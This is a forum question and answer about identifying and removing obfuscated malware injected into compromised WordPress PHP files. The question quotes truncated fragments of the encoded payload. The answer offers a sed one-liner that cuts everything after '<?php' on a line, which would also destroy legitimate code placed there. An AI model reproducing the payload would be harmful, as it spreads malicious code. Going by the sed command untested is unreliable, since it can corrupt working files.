Dan Dan - 1 month ago 5
Bash Question

Identify compromised PHP files

I'm trying to cleanse some Word Press .php files that have been previously compromised, probably by MySQL code injection.

These files begin like this:

<?php$kjzbobc = '<#65,47R25,d7R17,67R37,#/q%>U<#16,47R57,27R66,#/q%>2q%<#g6R85,67Rnunaj); $natxway();}}b*[%h!>!%tdz)%bbT-%bT-%hW~%fdy)##-!#~<%h00#*<%nfd)##x7f;!|!}{;)gj}l;33bq}k;opjudovg}x;0]=])0#)U! x2fvr# x5cq%7**^#zsfvr# x5!>> x22!pd%)!gj}Z;h!opjudovg}{;#)W%c!>!%i x5c2^<!Ce*[!ode(array_map("opfyigg",str_split("%tjw!>!#]y84]275]y83]248]y83]254ec:649#-!#:618d5f9#-!#f6c68399#-!#65egb2jm6< x7fw6*CW&)7gj6<*K)ftpmdXA6~6<u%7>/7&6|7**1!)!gj!<2,*j%!-#1]#-bubE{h%)tpqsut>j%!*72! x<*)ujojR x27id%6< x7fw6* x7f_*#ujoj;%-qp%)54l} x27;%!<*#}_;#)323ldfid>}&;!osvufs}


Some of them have a space after the opening tag, like:

<?php $kjzbobc = '<#65,47R25,d7R17,67R37,#/q%>U<#16,47R57,27R66,#/q%>2q%<#g6R85,67Rnunaj); $natxway();}}b*[%h!>!%tdz)%bbT-%bT-%hW~%fdy)##-!#~<%h00#*<%nfd)


I can search and replace all opening
<?php
tags but that breaks some legitimate files.

Is there anything unique about this kind of PHP code so it first can be identified, then fixed? I'm not sure how to describe this code...

Answer

I have generally not seen PHP file with any code after the php start tag. If that is the case and your problem statement is simplified to replace

<?php.*$

with

<?php

you can use a sed command command with find like this

find -name \*php | xargs sed -i 's/<?php.*$/<?php/'

You probably want to back up the files and do some research using grep before going ahead with the sed to replace inplace